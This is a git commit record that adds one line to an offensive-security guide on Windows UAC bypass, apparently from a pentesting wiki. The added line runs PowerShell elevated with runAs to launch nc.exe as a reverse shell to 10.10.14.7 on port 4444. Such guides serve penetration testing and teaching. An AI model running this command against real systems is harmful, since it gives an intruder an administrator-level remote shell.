GitBook: [master] one page modified

This commit is contained in:
CPol 2020-12-27 17:31:50 +00:00 committed by gitbook-bot
parent 43497ff855
commit 4dcbfbb4c8
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -141,6 +141,7 @@ If UAC is already disabled \(**`ConsentPromptBehaviorAdmin`**is **`0`**\) you ca
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
#### UAC bypass exploits